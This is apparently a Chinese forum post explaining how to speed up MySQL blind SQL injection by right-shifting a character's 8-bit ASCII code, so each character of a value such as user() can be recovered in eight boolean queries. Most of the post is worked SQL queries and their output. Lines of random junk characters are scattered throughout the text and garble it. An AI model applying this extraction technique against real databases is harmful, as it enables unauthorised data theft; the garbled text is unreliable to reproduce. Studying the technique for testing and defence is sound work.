关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


) |+ k' H3 d, E. i6 ^; H% e# }
. n# x6 X3 i; \% O3 [4 b4 J下面将以查询mysql数据库当中user()的第一位为例:
. }( D# Y; w6 H
+ E" q# p. w( |: W4 G% m7 d( Z' f

ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

8 \! e7 R6 ~7 E" ^
. p% N7 G8 z( o' A! F. h6 s4 }, g& p2 F
首先执行如下sql语句:


- R0 `% V$ M: T# R
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
% |! X, K8 n  }
# K) p" T) r5 A
" ^: Z3 B. ]1 h! X& S
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
: i, W* e& \8 p, T! J. U) e


第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
  v" J% c+ n4 ^' b6 `9 E
  P# g2 ]! n' C; s/ h3 Z/ c+ {: w
4 b" t4 `: [: |' ]. ~
如果运算结果为1,说明第一位为0,不为1
& s0 J" }4 ~6 h8 ^  @! u
0 }0 W  Q# _) I$ u' G! O
4 G$ H4 c/ Y- |
: P2 L, I2 m* t* `+————————————–+

| (ascii((substr(user(),1,1))) >> 7)=0 |
6 M# s( F4 \4 |; _  a8 Q5 n
+————————————–+
. c6 J7 b) W& n. i
| 1 |
" z: m" ]& {* I$ e% O+ B
8 _* z% j9 t$ a+ O$ h' p+————————————–+
- Y8 q5 w& \9 s" R  |5 g
' E9 v" Z0 S. G4 Q% A1 row in set (0.00 sec)

这样我们就确定这个8bit的ascii的第一位为0

* U* Q- d; i8 ?6 l( N  D) {5 h9 d
# Z8 y' `" I$ g9 ?) J: Y
第二次我们来做6次右偏移来确定前两位
* l+ u1 h* D$ H( N8 t/ Z. Z) M


7 N1 [& {) }# e, K: D+ o2 q前两位可能是01或00,即依然可以与0做比较,

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

' t& y% _! t8 R( ^) v9 @: {  `) V6 N+ N. m| (ascii((substr(user(),1,1))) >> 6)=0 |
& z8 m0 b3 _# }; d% Q7 h" I; J- ?
3 c: h# ~& E3 C& l* R0 X+————————————–+
/ k9 _. a6 J. A1 R
: x( [6 n) |: `' \| 0 |
+ |1 h5 o8 g& @4 V. t7 @) V+ m) u
) b! W( T1 \! L' o/ c0 o8 M+————————————–+

1 row in set (0.00 sec)


4 E' N% O  ~& G
4 H! ]* w5 [$ O, N结果为0,即第二位为1
2 l: k$ h0 n7 V9 i" r7 z- q: c
& z8 K; v$ Y  \% P5 l+ u: T1 R
+ o6 z+ P5 q# d) X' ?  P) l4 |9 @
/ [. X- K( _8 H4 N8 x, W4 c4 I开始猜测前三位为010或011
# b, o+ F$ L9 m6 n& k
# A% u- C# I5 E: b8 |+ K) p
! S' K8 X! N" ~: U
让我们看看010和011的ascii码是多少



5 W5 X1 [5 ^. S8 y) b$ l" k( k分别查询select b’011′ select b’010′


! F& L9 R: n( o' J8 G  Y- v
获得结果 010 = 2 011 = 3
+ f1 d% A( G" E5 w: |, y- d

2 a% i8 k$ \, w6 t+ U8 U
% j1 v8 t2 s8 t3 v$ x( A5 `( W  y3 p% K执行如下sql:
8 D  f5 \6 E" Q3 Z& i" I# \, l6 U


7 a, F, r% p# Dmysql> select (ascii((substr(user(),1,1))) >> 5)=2;
" p, g+ [1 w  L' E. E/ \! b3 @
" ]: h% E$ |' w. N3 ~% r$ Y+————————————–+

| (ascii((substr(user(),1,1))) >> 5)=2 |

3 B* q& \% N8 B+————————————–+
. ^& {5 X. ~4 ]4 m% e' a
, e- O5 @# Z9 H) H7 `% N) Y1 T| 0 |

+————————————–+

即前三位不为010,而是011

# V" L3 u- C/ q* W6 b

直到获得最后一位

/ }0 l/ R# N! y" {
7 m5 {# S6 _: |6 @0 y! ]7 C
最终结果为:01110010


( I0 b7 V( g6 }" c7 Z
转换一下:


# q0 x4 h( ?7 v8 s& j6 [6 B( u
select b’01110010′

0 n1 Q, ?9 x- u5 y
! T; s1 I- X4 z0 E
$ h% S* O. l) W" F+ o查询结果
6 n$ T6 M. N3 e


+————-+
+ ^* N; q1 x/ b
| b’01110010′ |

+————-+

& Y$ i* e( Y$ H) D" p4 T! C| r |

4 M3 N$ _9 u4 |; c+————-+
  V4 Q6 N* X0 W) g
  O% ~5 D  L" |1 w; m1 row in set (0.00 sec)


+ l+ N* A0 m- m7 o! U3 r  I
这样我们就获得了user()的第一位.其它位依此类推

5 p* z2 s- D9 Q0 r% D